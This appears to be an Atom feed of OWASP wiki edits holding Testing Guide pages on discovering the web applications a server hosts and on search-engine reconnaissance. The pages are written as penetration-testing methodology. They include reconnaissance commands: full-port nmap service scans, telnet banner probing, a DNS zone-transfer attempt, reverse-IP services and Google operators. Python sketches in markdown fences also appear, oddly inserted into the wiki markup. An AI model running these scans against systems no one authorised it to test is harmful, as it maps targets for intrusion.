<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
		<id>https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=KirstenS</id>
		<title>OWASP - User contributions [en]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=KirstenS"/>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php/Special:Contributions/KirstenS"/>
		<updated>2026-04-20T18:12:46Z</updated>
		<subtitle>User contributions</subtitle>
		<generator>MediaWiki 1.27.2</generator>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=63622</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=63622"/>
				<updated>2009-06-04T23:42:29Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Black Box testing and example */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:OWASP Testing Guide v3}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A paramount step in testing for web application vulnerabilities is to find out which particular applications are hosted on a web server. Many applications have known vulnerabilities and known attack strategies that can be exploited to gain remote control or to steal data. In addition, many applications are misconfigured or not kept up to date, due to the perception that they are only used &amp;quot;internally&amp;quot; and therefore pose no threat.&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1 relationship between an IP address and a web server is losing much of its original significance. It is not uncommon to have multiple web sites or applications whose symbolic names resolve to the same IP address (this scenario is not limited to hosting environments, but applies to ordinary corporate environments as well).&lt;br /&gt;
&lt;br /&gt;
As a security professional, you are sometimes given a set of IP addresses (or possibly just one) as a target to test. It is arguable that this scenario is more akin to a pentest-type engagement, but in any case such an assignment is expected to test all web applications accessible through the target (and possibly other things). The problem is that the given IP address may host an HTTP service on port 80 which, when accessed by IP address (which is all you know), reports &amp;quot;No web server configured at this address&amp;quot; or a similar message. Yet that system could &amp;quot;hide&amp;quot; any number of web applications associated with unrelated symbolic (DNS) names. Obviously, the extent of your analysis is deeply affected by whether you test all of these applications or miss some of them because you never notice they exist.&lt;br /&gt;
Sometimes the target specification is richer: perhaps you are handed a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey only partial information, i.e., it could omit some symbolic names, and the client may not even be aware of that (this is more likely to happen in large organizations)!&lt;br /&gt;
&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&lt;br /&gt;
To address these issues, it is necessary to perform web application discovery.&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
Web application discovery is a process aimed at identifying web applications on a given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may consist of a set of DNS symbolic names or a mix of the two.&lt;br /&gt;
This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should strive to be as comprehensive in scope as possible, i.e., it should identify all the applications accessible through the given target. The following examples examine a few techniques that can be employed to achieve this goal. &lt;br /&gt;
&lt;br /&gt;
'''Note:''' Some of the following techniques apply only to Internet-facing web servers, namely the web-based DNS and reverse-IP search services and the use of search engines. Examples make use of private IP addresses (such as ''192.168.1.100''), which, unless indicated otherwise, represent ''generic'' IP addresses and are used only for anonymity purposes.&lt;br /&gt;
&lt;br /&gt;
There are three factors influencing how many applications are related to a given DNS name (or an IP address):&lt;br /&gt;
&lt;br /&gt;
'''1. Different base URL''' &amp;lt;br&amp;gt;&lt;br /&gt;
The obvious entry point for a web application is ''www.example.com'', i.e., with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies for https). However, even though this is the most common situation, there is nothing forcing the application to start at “/”.&lt;br /&gt;
For example, the same symbolic name may be associated to three web applications such as:&lt;br /&gt;
http://www.example.com/url1 &lt;br /&gt;
http://www.example.com/url2 &lt;br /&gt;
http://www.example.com/url3 &lt;br /&gt;
In this case, the URL http://www.example.com/ would not be associated with a meaningful page, and the three applications would be “hidden” unless we explicitly know how to reach them, i.e., we know ''url1'', ''url2'' or ''url3''. There is usually no need to publish web applications in this way, unless you don’t want them to be accessible in a standard way and you are prepared to inform your users about their exact location. This doesn’t mean that these applications are secret, just that their existence and location are not explicitly advertised.&lt;br /&gt;
&lt;br /&gt;
'''2. Non-standard ports'''&amp;lt;br&amp;gt;&lt;br /&gt;
While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/. For example, http://www.example.com:20000/.&lt;br /&gt;
&lt;br /&gt;
'''3. Virtual hosts'''&amp;lt;br&amp;gt;&lt;br /&gt;
DNS allows us to associate a single IP address with one or more symbolic names. For example, the IP address ''192.168.1.100'' might be associated with the DNS names ''www.example.com, helpdesk.example.com, webmail.example.com'' (it is not even necessary that all the names belong to the same DNS domain). This 1-to-N relationship can be used to serve different content by means of so-called virtual hosts. The information specifying the virtual host we are referring to is embedded in the HTTP 1.1 ''Host:'' header [1].&lt;br /&gt;
&lt;br /&gt;
We would not suspect the existence of other web applications in addition to the obvious ''www.example.com'', unless we know of ''helpdesk.example.com'' and ''webmail.example.com''.&lt;br /&gt;
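As a sketch of the mechanism just described (not part of the original guide): the probes below target one and the same IP address and differ only in the ''Host:'' header. `build_request` is a hypothetical helper; actually sending the bytes over a TCP socket is omitted so the example stays self-contained.

```python
# Sketch: the same IP address serves different virtual hosts depending solely
# on the HTTP/1.1 Host: header. build_request is a hypothetical helper; a real
# probe would send these bytes to 192.168.1.100:80 over a TCP socket.

def build_request(host: str, path: str = "/") -> bytes:
    """Build a raw HTTP/1.1 GET request addressed to the given virtual host."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n\r\n"
    ).encode("ascii")

# The three DNS names from the example, all resolving to one IP address:
for name in ("www.example.com", "helpdesk.example.com", "webmail.example.com"):
    print(build_request(name).split(b"\r\n")[1])  # only the Host: line differs
```

Repeating such requests against the bare IP, once per candidate name, is exactly what virtual-host discovery tools automate.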
&lt;br /&gt;
'''Approaches to address issue 1 - non-standard URLs'''&amp;lt;br&amp;gt;&lt;br /&gt;
There is no way to fully ascertain the existence of non-standard-named web applications. Being non-standard, there are no fixed criteria governing the naming convention; however, there are a number of techniques that the tester can use to gain some additional insight. &lt;br /&gt;
First, if the web server is misconfigured and allows directory browsing, it may be possible to spot these applications. Vulnerability scanners may help in this respect.&lt;br /&gt;
Second, these applications may be referenced by other web pages; as such, there is a chance that they have been spidered and indexed by web search engines. If we suspect the existence of such “hidden” applications on ''www.example.com'', we could do a bit of googling by using the ''site'' operator and examining the result of a query for “site:www.example.com”. Among the returned URLs there could be one pointing to such a non-obvious application.&lt;br /&gt;
Another option is to probe for URLs which might be likely candidates for non-published applications. For example, a web mail front end might be accessible from URLs such as https://www.example.com/webmail, https://webmail.example.com/, or https://mail.example.com/. The same holds for administrative interfaces, which may be published at hidden URLs (for example, a Tomcat administrative interface), and yet not referenced anywhere. So, doing a bit of dictionary-style searching (or “intelligent guessing”) could yield some results. Vulnerability scanners may help in this respect.&lt;br /&gt;
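The dictionary-style guessing just described can be sketched as follows; the wordlist is illustrative only, and the actual probing (e.g., issuing an HTTP HEAD per candidate and noting non-error responses) is deliberately left as a comment.

```python
# Sketch: enumerate candidate URLs for unadvertised applications from a small
# wordlist (illustrative, not exhaustive). In a real test each candidate would
# be requested, e.g. with an HTTP HEAD, and non-404 responses investigated.

WORDLIST = ["webmail", "mail", "admin", "manager", "phpmyadmin"]

def candidate_urls(domain: str, words=WORDLIST):
    urls = []
    for w in words:
        urls.append(f"https://{domain}/{w}")   # path-based guess, e.g. /webmail
        urls.append(f"https://{w}.{domain}/")  # host-based guess, e.g. webmail.example.com
    return urls

for url in candidate_urls("example.com"):
    print(url)
```
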
&lt;br /&gt;
'''Approaches to address issue 2 - non-standard ports'''&amp;lt;br&amp;gt;&lt;br /&gt;
It is easy to check for the existence of web applications on non-standard ports. A port scanner such as nmap [2] is capable of performing service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.&lt;br /&gt;
For example, the following command will look up, with a TCP connect scan, all open ports on IP ''192.168.1.100'' and will try to determine what services are bound to them (only ''essential'' switches are shown – nmap features a broad set of options, whose discussion is out of scope):&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nmap -PN -sT -sV -p0-65535 192.168.1.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
It is sufficient to examine the output and look for http or the indication of SSL-wrapped services (which should be probed to confirm that they are https). For example, the output of the previous command could look like:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Interesting ports on 192.168.1.100:&lt;br /&gt;
(The 65527 ports scanned but not shown below are in state: closed)&lt;br /&gt;
PORT      STATE SERVICE     VERSION&lt;br /&gt;
22/tcp    open  ssh         OpenSSH 3.5p1 (protocol 1.99)&lt;br /&gt;
80/tcp    open  http        Apache httpd 2.0.40 ((Red Hat Linux))&lt;br /&gt;
443/tcp   open  ssl         OpenSSL&lt;br /&gt;
901/tcp   open  http        Samba SWAT administration server&lt;br /&gt;
1241/tcp  open  ssl         Nessus security scanner&lt;br /&gt;
3690/tcp  open  unknown&lt;br /&gt;
8000/tcp  open  http-alt?&lt;br /&gt;
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
From this example, we see that:&lt;br /&gt;
* There is an Apache http server running on port 80.&lt;br /&gt;
* It looks like there is an https server on port 443 (but this needs to be confirmed, for example, by visiting https://192.168.1.100 with a browser).&lt;br /&gt;
* On port 901 there is a Samba SWAT web interface.&lt;br /&gt;
* The service on port 1241 is not https, but is the SSL-wrapped Nessus daemon.&lt;br /&gt;
* Port 3690 features an unspecified service (nmap gives back its ''fingerprint'' - here omitted for clarity - together with instructions to submit it for incorporation in the nmap fingerprint database, provided you know which service it represents).&lt;br /&gt;
* Another unspecified service on port 8000; this might possibly be http, since it is not uncommon to find http servers on this port. Let's give it a look:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ telnet 192.168.1.100 8000&lt;br /&gt;
Trying 192.168.1.100...&lt;br /&gt;
Connected to 192.168.1.100.&lt;br /&gt;
Escape character is '^]'.&lt;br /&gt;
GET / HTTP/1.0&lt;br /&gt;
&lt;br /&gt;
HTTP/1.0 200 OK&lt;br /&gt;
pragma: no-cache&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
Server: MX4J-HTTPD/1.0&lt;br /&gt;
expires: now&lt;br /&gt;
Cache-Control: no-cache&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
This confirms that it is indeed an HTTP server. Alternatively, we could have visited the URL with a web browser, or used the GET or HEAD commands provided by Perl's LWP library (lwp-request), which mimic HTTP interactions such as the one given above (note, however, that HEAD requests may not be honored by all servers).&lt;br /&gt;
* Apache Tomcat running on port 8080.&lt;br /&gt;
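As a self-contained sketch of the probe above (not from the original guide), the function below parses a raw HTTP response, the one captured in the telnet session, and extracts the two pieces of information the tester is after: the status line and the Server banner. In a live probe, `raw_response` would be read from a TCP socket after sending `GET / HTTP/1.0`.

```python
# Sketch: extract the status line and Server header from a raw HTTP response,
# as captured in the telnet session above. A live probe would read these bytes
# from a TCP socket after sending "GET / HTTP/1.0\r\n\r\n".

def server_banner(raw_response: str):
    head = raw_response.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    status = lines[0]
    server = next((l.split(":", 1)[1].strip()
                   for l in lines[1:] if l.lower().startswith("server:")), None)
    return status, server

sample = (
    "HTTP/1.0 200 OK\r\n"
    "pragma: no-cache\r\n"
    "Content-Type: text/html\r\n"
    "Server: MX4J-HTTPD/1.0\r\n"
    "expires: now\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
    "<html>..."
)
print(server_banner(sample))  # → ('HTTP/1.0 200 OK', 'MX4J-HTTPD/1.0')
```
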
&lt;br /&gt;
The same task may be performed by vulnerability scanners, but first check that your scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided you instruct it to scan all the ports) and, in addition to what nmap offers, will run a number of tests for known web server vulnerabilities as well as checks on the SSL configuration of https services. As hinted before, Nessus is also able to spot popular applications and web interfaces which could otherwise go unnoticed (for example, a Tomcat administrative interface).&lt;br /&gt;
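The triage of nmap's output described above can also be sketched programmatically; the parser below is a simplification (it keys on the SERVICE column only) and runs against the example output shown earlier.

```python
# Sketch: pick out candidate web services from nmap -sV output lines.
# "http" services are direct candidates; "ssl" services must be probed
# manually to confirm whether they are actually https.

NMAP_OUTPUT = """\
22/tcp    open  ssh         OpenSSH 3.5p1 (protocol 1.99)
80/tcp    open  http        Apache httpd 2.0.40 ((Red Hat Linux))
443/tcp   open  ssl         OpenSSL
901/tcp   open  http        Samba SWAT administration server
1241/tcp  open  ssl         Nessus security scanner
3690/tcp  open  unknown
8000/tcp  open  http-alt?
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1"""

def web_candidates(nmap_output: str):
    candidates = []
    for line in nmap_output.splitlines():
        fields = line.split(None, 3)
        if len(fields) < 3 or fields[1] != "open":
            continue
        port = int(fields[0].split("/")[0])
        service = fields[2]
        if service.startswith("http"):   # http, http-alt?, ...
            candidates.append((port, "http"))
        elif service == "ssl":           # SSL-wrapped: confirm https manually
            candidates.append((port, "ssl?"))
    return candidates

print(web_candidates(NMAP_OUTPUT))
```
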
&lt;br /&gt;
'''Approaches to address issue 3 - virtual hosts'''&amp;lt;br&amp;gt;&lt;br /&gt;
There are a number of techniques which may be used to identify DNS names associated with a given IP address ''x.y.z.t''.&lt;br /&gt;
&lt;br /&gt;
''DNS zone transfers''&amp;lt;br&amp;gt;&lt;br /&gt;
This technique has limited use nowadays, given the fact that zone transfers are largely not honored by DNS servers. However, it may be worth a try.&lt;br /&gt;
First of all, we must determine the name servers serving ''x.y.z.t''. If a symbolic name is known for ''x.y.z.t'' (let it be ''www.example.com''), its name servers can be determined by means of tools such as ''nslookup'', ''host'', or ''dig'', by requesting DNS NS records.&lt;br /&gt;
If no symbolic names are known for ''x.y.z.t'', but your target definition contains at least a symbolic name, you may try to apply the same process and query the name server of that name (hoping that ''x.y.z.t'' will be served as well by that name server). For example, if your target consists of the IP address ''x.y.z.t'' and the name ''mail.example.com'', determine the name servers for domain ''example.com''.&lt;br /&gt;
&lt;br /&gt;
The following example shows how to identify the name servers for www.owasp.org by using the host command:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ host -t ns www.owasp.org&lt;br /&gt;
www.owasp.org is an alias for owasp.org.&lt;br /&gt;
owasp.org name server ns1.secure.net.&lt;br /&gt;
owasp.org name server ns2.secure.net.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
A zone transfer may now be requested from the name servers for domain ''example.com''. If you are lucky, you will get back a list of the DNS entries for this domain. This will include the obvious ''www.example.com'' and the not-so-obvious ''helpdesk.example.com'' and ''webmail.example.com'' (and possibly others). Check all names returned by the zone transfer and consider all of those which are related to the target being evaluated. &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Trying to request a zone transfer for owasp.org from one of its name servers:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ host -l owasp.org ns1.secure.net&lt;br /&gt;
Using domain server:&lt;br /&gt;
Name: ns1.secure.net&lt;br /&gt;
Address: 192.220.124.10#53&lt;br /&gt;
Aliases:&lt;br /&gt;
&lt;br /&gt;
Host owasp.org not found: 5(REFUSED)&lt;br /&gt;
; Transfer failed.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''DNS inverse queries''&amp;lt;br&amp;gt;&lt;br /&gt;
This process is similar to the previous one, but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issuing a query on the given IP address. If you are lucky, you may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic-name maps, which is not guaranteed.&lt;br /&gt;
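As a sketch of how an inverse query is addressed: the PTR name for an IPv4 address is the address with its octets reversed under in-addr.arpa. The actual lookup, which needs network access and is therefore only shown as a comment, could use Python's `socket.gethostbyaddr`.

```python
# Sketch: build the in-addr.arpa name used for an inverse (PTR) DNS query.
# The actual lookup would be, e.g.:  socket.gethostbyaddr("192.168.1.100")
# (needs network access, so it is only shown as a comment here).

def ptr_name(ipv4: str) -> str:
    octets = ipv4.split(".")
    assert len(octets) == 4, "IPv4 dotted-quad expected"
    return ".".join(reversed(octets)) + ".in-addr.arpa"

print(ptr_name("192.168.1.100"))  # → 100.1.168.192.in-addr.arpa
```
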
&lt;br /&gt;
''Web-based DNS searches''&amp;lt;br&amp;gt;&lt;br /&gt;
This kind of search is akin to a DNS zone transfer, but relies on web-based services that enable name-based searches on DNS. One such service is the ''Netcraft Search DNS'' service, available at http://searchdns.netcraft.com/?host. You may query for a list of names belonging to your domain of choice, such as ''example.com'', and then check whether the names you obtained are pertinent to the target you are examining.&lt;br /&gt;
&lt;br /&gt;
''Reverse-IP services''&amp;lt;br&amp;gt;&lt;br /&gt;
Reverse-IP services are similar to DNS inverse queries, with the difference that you query a web-based application instead of a name server. There are a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis.&lt;br /&gt;
&lt;br /&gt;
''Domain tools reverse IP'': http://www.domaintools.com/reverse-ip/ &lt;br /&gt;
(requires free membership) &lt;br /&gt;
&lt;br /&gt;
''MSN search'': http://search.msn.com &lt;br /&gt;
syntax: &amp;quot;ip:x.x.x.x&amp;quot; (without the quotes) &lt;br /&gt;
&lt;br /&gt;
''Webhosting info'': http://whois.webhosting.info/  &lt;br /&gt;
syntax: http://whois.webhosting.info/x.x.x.x &lt;br /&gt;
&lt;br /&gt;
''DNSstuff'': http://www.dnsstuff.com/ &lt;br /&gt;
(multiple services available) &lt;br /&gt;
&lt;br /&gt;
''MSNPawn'': http://net-square.com/msnpawn/index.shtml &lt;br /&gt;
(multiple queries on domains and IP addresses, requires installation) &lt;br /&gt;
&lt;br /&gt;
''tomDNS'': http://www.tomdns.net/ &lt;br /&gt;
(some services are still private at the time of writing) &lt;br /&gt;
&lt;br /&gt;
''SEOlogs.com'': http://www.seologs.com/ip-domains.html &lt;br /&gt;
(reverse-IP/domain lookup) &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following example shows the result of a query for 216.48.3.18, the IP address of www.owasp.org, submitted to one of the above reverse-IP services. Three additional non-obvious symbolic names mapping to the same address have been revealed.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:Owasp-Info.jpg]]&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''Googling''&amp;lt;br&amp;gt;&lt;br /&gt;
Following information gathering with the previous techniques, you can rely on search engines to refine and extend your analysis. This may yield evidence of additional symbolic names belonging to your target, or applications accessible via non-obvious URLs. &lt;br /&gt;
For instance, considering the previous example regarding ''www.owasp.org'', you could query Google and other search engines looking for information (hence, DNS names) related to the newly discovered domains of ''webgoat.org'', ''webscarab.com'', and ''webscarab.net''.&lt;br /&gt;
Googling techniques are explained in [[Testing: Spiders, Robots, and Crawlers (OWASP-IG-001)|Testing: Spiders, Robots, and Crawlers]].&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
The methodology is the same as listed under Black Box testing, no matter how much information you start with.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&lt;br /&gt;
[1] RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Tools'''&lt;br /&gt;
* DNS lookup tools such as ''nslookup'', ''dig'' or similar. &lt;br /&gt;
* Port scanners (such as nmap, http://www.insecure.org) and vulnerability scanners (such as Nessus: http://www.nessus.org; wikto: http://www.sensepost.com/research/wikto/). &lt;br /&gt;
* Search engines (Google, and other major engines). &lt;br /&gt;
* Specialized DNS-related web-based search service: see text.&lt;br /&gt;
* nmap - http://www.insecure.org &lt;br /&gt;
* Nessus Vulnerability Scanner - http://www.nessus.org&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Conduct_search_engine_discovery/reconnaissance_for_information_leakage_(OTG-INFO-001)&amp;diff=63620</id>
		<title>Conduct search engine discovery/reconnaissance for information leakage (OTG-INFO-001)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Conduct_search_engine_discovery/reconnaissance_for_information_leakage_(OTG-INFO-001)&amp;diff=63620"/>
				<updated>2009-06-04T22:37:58Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Black Box Testing */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:OWASP Testing Guide v3}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
This section describes how to search the Google Index and remove the associated web content from the Google Cache.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
Once the GoogleBot has completed crawling, it commences indexing the web page based on tags and associated attributes, such as &amp;lt;TITLE&amp;gt;, in order to return the relevant search results. [1]&lt;br /&gt;
&lt;br /&gt;
If the robots.txt file is not kept up to date during the lifetime of the web site, it is possible for web content that was never intended to appear in Google's search results to be indexed and returned.&lt;br /&gt;
&lt;br /&gt;
Such content must therefore be removed from the Google Cache.&lt;br /&gt;
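On the preventive side, a minimal robots.txt sketch (the path below is illustrative, not from this article) asks crawlers not to index a directory. Note that robots.txt is purely advisory: it does not protect the content, and it itself reveals the paths it lists, so removal from the Google index (see reference [4]) is still required for content already cached.

```text
# Illustrative robots.txt; /internal/ is a hypothetical path.
User-agent: *
Disallow: /internal/
```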
&lt;br /&gt;
== Black Box Testing==&lt;br /&gt;
Using the advanced &amp;quot;site:&amp;quot; search operator, it is possible to restrict Search Results to a specific domain [2].&lt;br /&gt;
&lt;br /&gt;
Google provides the advanced &amp;quot;cache:&amp;quot; search operator [2], but this is equivalent to clicking the &amp;quot;Cached&amp;quot; link next to each Google Search Result. Hence, using the advanced &amp;quot;site:&amp;quot; search operator and then clicking &amp;quot;Cached&amp;quot; is preferred.&lt;br /&gt;
&lt;br /&gt;
The Google SOAP Search API supports the doGetCachedPage and the associated doGetCachedPageResponse SOAP Messages [3] to assist with retrieving cached pages. An implementation of this is under development by the [[::Category:OWASP_Google_Hacking_Project |OWASP &amp;quot;Google Hacking&amp;quot; Project]].&lt;br /&gt;
&lt;br /&gt;
== Example ==&lt;br /&gt;
To find the web content of owasp.org indexed by Google Cache the following Google Search Query is issued:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
site:owasp.org&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
[[Image:Google_site_Operator_Search_Results_Example.JPG]]&lt;br /&gt;
&lt;br /&gt;
To display the index.html of owasp.org as cached by Google the following Google Search Query is issued:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cache:owasp.org&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
[[Image:Google_Cached_Example.JPG]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
Gray Box testing is the same as Black Box testing above.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
[1] &amp;quot;Google 101: How Google crawls, indexes, and serves the web&amp;quot; - http://www.google.com/support/webmasters/bin/answer.py?answer=70897 &amp;lt;br&amp;gt;&lt;br /&gt;
[2] &amp;quot;Advanced Google Search Operators&amp;quot; - http://www.google.com/help/operators.html &amp;lt;br&amp;gt;&lt;br /&gt;
[3] &amp;quot;Google SOAP Search API&amp;quot; - http://code.google.com/apis/soapsearch/reference.html#1_2 &amp;lt;br&amp;gt;&lt;br /&gt;
[4] &amp;quot;Preventing content from appearing in Google search results&amp;quot; - http://www.google.com/support/webmasters/bin/topic.py?topic=8459&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_Guide_Introduction&amp;diff=62232</id>
		<title>Testing Guide Introduction</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_Guide_Introduction&amp;diff=62232"/>
				<updated>2009-05-27T12:54:40Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* References */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:OWASP Testing Guide v3}}&lt;br /&gt;
&lt;br /&gt;
=== The OWASP Testing Project ===&lt;br /&gt;
----&lt;br /&gt;
The OWASP Testing Project has been in development for many years. With this project, we wanted to help people understand the ''what'', ''why'', ''when'', ''where'', and ''how'' of testing their web applications, and not just provide a simple checklist or prescription of issues that should be addressed. The outcome of this project is a complete Testing Framework, from which others can build their own testing programs or qualify other people’s processes. The Testing Guide describes in detail both the general Testing Framework and the techniques required to implement the framework in practice.&lt;br /&gt;
&lt;br /&gt;
Writing the Testing Guide has proven to be a difficult task. It has been a challenge to obtain consensus and develop the content that allows people to apply the concepts described here, while enabling them to work in their own environment and culture. It has also been a challenge to change the focus of web application testing from penetration testing to testing integrated in the software development life cycle. &lt;br /&gt;
&lt;br /&gt;
However, we are very satisfied with the results we have reached. Many industry experts and those responsible for software security at some of the largest companies in the world are validating the Testing Framework. This framework helps organizations test their web applications in order to build reliable and secure software, rather than simply highlighting areas of weakness, although the latter is certainly a byproduct of many of OWASP’s guides and checklists. As such, we have made some hard decisions about the appropriateness of certain testing techniques and technologies, which we fully understand will not be agreed upon by everyone. However, OWASP is able to take the high ground and change culture over time through awareness and education based on consensus and experience.&lt;br /&gt;
&lt;br /&gt;
The rest of this guide is organized as follows. This introduction covers the pre-requisites of testing web applications: the scope of testing, the principles of successful testing, and testing techniques. Chapter 3 presents the OWASP Testing Framework and explains its techniques and tasks in relation to the various phases of the software development life cycle. Chapter 4 covers how to test for specific vulnerabilities (e.g., SQL Injection) by code inspection and penetration testing. &lt;br /&gt;
&lt;br /&gt;
'''Measuring (in)security: the Economics of Insecure Software'''&amp;lt;br&amp;gt;&lt;br /&gt;
A basic tenet of software engineering is that you can't control what you can't measure [1]. Security testing is no different. Unfortunately, measuring security is a notoriously difficult process. We will not cover this topic in detail here, since it would take a guide on its own (for an introduction, see [2]). &lt;br /&gt;
&lt;br /&gt;
One aspect that we want to emphasize, however, is that security measurements are, by necessity, about both the specific technical issues (e.g., how prevalent a certain vulnerability is) and how these issues affect the economics of software. We find that most technical people have at least a basic understanding of the vulnerabilities, and some a much deeper one. Sadly, few are able to translate that technical knowledge into monetary terms and thereby quantify the potential cost of vulnerabilities to the application owner's business. We believe that until this happens, CIOs will not be able to develop an accurate return on security investment and, subsequently, assign appropriate budgets for software security.&amp;lt;br/&amp;gt;&lt;br /&gt;
While estimating the cost of insecure software may appear a daunting task, recently there has been a significant amount of work in this direction. For example, in June 2002, the US National Institute of Standards (NIST) published a survey on the cost of insecure software to the US economy due to inadequate software testing [3]. Interestingly, they estimate that a better testing infrastructure would save more than a third of these costs, or about $22 billion a year. More recently, the links between economics and security have been studied by academic researchers. See [4] for more information about some of these efforts.&lt;br /&gt;
&lt;br /&gt;
The framework described in this document encourages people to measure security throughout their entire development process. They can then relate the cost of insecure software to the impact it has on their business, and consequently develop appropriate business decisions (resources) to manage the risk. Remember: measuring and testing web applications is even more critical than for other software, since web applications are exposed to millions of users through the Internet.&lt;br /&gt;
&lt;br /&gt;
'''What is Testing'''&amp;lt;br&amp;gt;&lt;br /&gt;
What do we mean by testing? During the development life cycle of a web application, many things need to be tested. The Merriam-Webster Dictionary describes testing as: &lt;br /&gt;
* To put to test or proof. &lt;br /&gt;
* To undergo a test. &lt;br /&gt;
* To be assigned a standing or evaluation based on tests. &lt;br /&gt;
For the purposes of this document, testing is a process of comparing the state of a system/application against a set of criteria. In the security industry, people frequently test against a set of mental criteria that are neither well defined nor complete. For this reason and others, many outsiders regard security testing as a black art. This document’s aim is to change that perception and to make it easier for people without in-depth security knowledge to make a difference. &lt;br /&gt;
&lt;br /&gt;
'''Why Testing'''&amp;lt;br&amp;gt;&lt;br /&gt;
This document is designed to help organizations understand what comprises a testing program, and to help them identify the steps that they need to undertake to build and operate that testing program on their web applications. It is intended to give a broad view of the elements required to make a comprehensive web application security program. This guide can be used as a reference and as a methodology to help determine the gap between your existing practices and industry best practices. This guide allows organizations to compare themselves against industry peers, to understand the magnitude of resources required to test and maintain their software, or to prepare for an audit. This chapter does not go into the technical details of how to test an application, as the intent is to provide a typical security organizational framework. The technical details about how to test an application, as part of a penetration test or code review, will be covered in the remaining parts of this document. &lt;br /&gt;
&lt;br /&gt;
'''When to Test'''&amp;lt;br&amp;gt;&lt;br /&gt;
